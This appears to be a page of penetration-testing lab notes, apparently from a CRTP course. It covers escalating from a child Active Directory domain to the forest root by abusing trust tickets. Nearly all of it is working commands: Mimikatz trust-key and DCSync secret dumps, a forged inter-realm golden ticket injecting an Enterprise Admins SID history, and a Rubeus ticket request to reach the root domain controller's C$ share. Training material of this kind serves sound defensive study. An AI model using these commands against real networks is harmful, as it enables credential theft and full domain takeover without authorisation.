Using Trust Tickets

Child to Parent using Trust Tickets

We will extract the trust key, and then forge an inter-realm TGT where we inject a SID History of Enterprise Admin.

  1. To extract trust tickets, look for [In] trust key from child to parent.

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc

OR run DCSync to extract 

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'

OR extract all the secrets from DC

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

  1. Now, we can forge the inter-realm TGT using the trust key obtained. Note: Unless, explicitly specified, across trusts (within or across forests), AES is not supported. RC4 is supported.

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:e9ab2e57f6397c19b62476e98e9521ac /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit"
Option
Description

Kerberos::golden

The mimikatz module

/domain

FQDN of the current domain

/sid

SID of the current domain

/sids

SID of the enterprise admins group of the parent domain

/rc4

RC4 of the trust key

/user

User to impersonate

/service

Target service in the parent domain

/target

FQDN of the parent domain

/ticket

Path where the ticket is to be saved (e.g., C:\AD\Tools\trust_tkt.kirbi)

  1. Now we can request a TGS from parent DC to access a service (CIFS) on DC on the parent root DC.

Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

  1. We can now access forest root DC.

ls \\mcorp-dc.moneycorp.local\c$
PreviousChild to Parent (Cross Domain)NextCRTP Lab 18

Last updated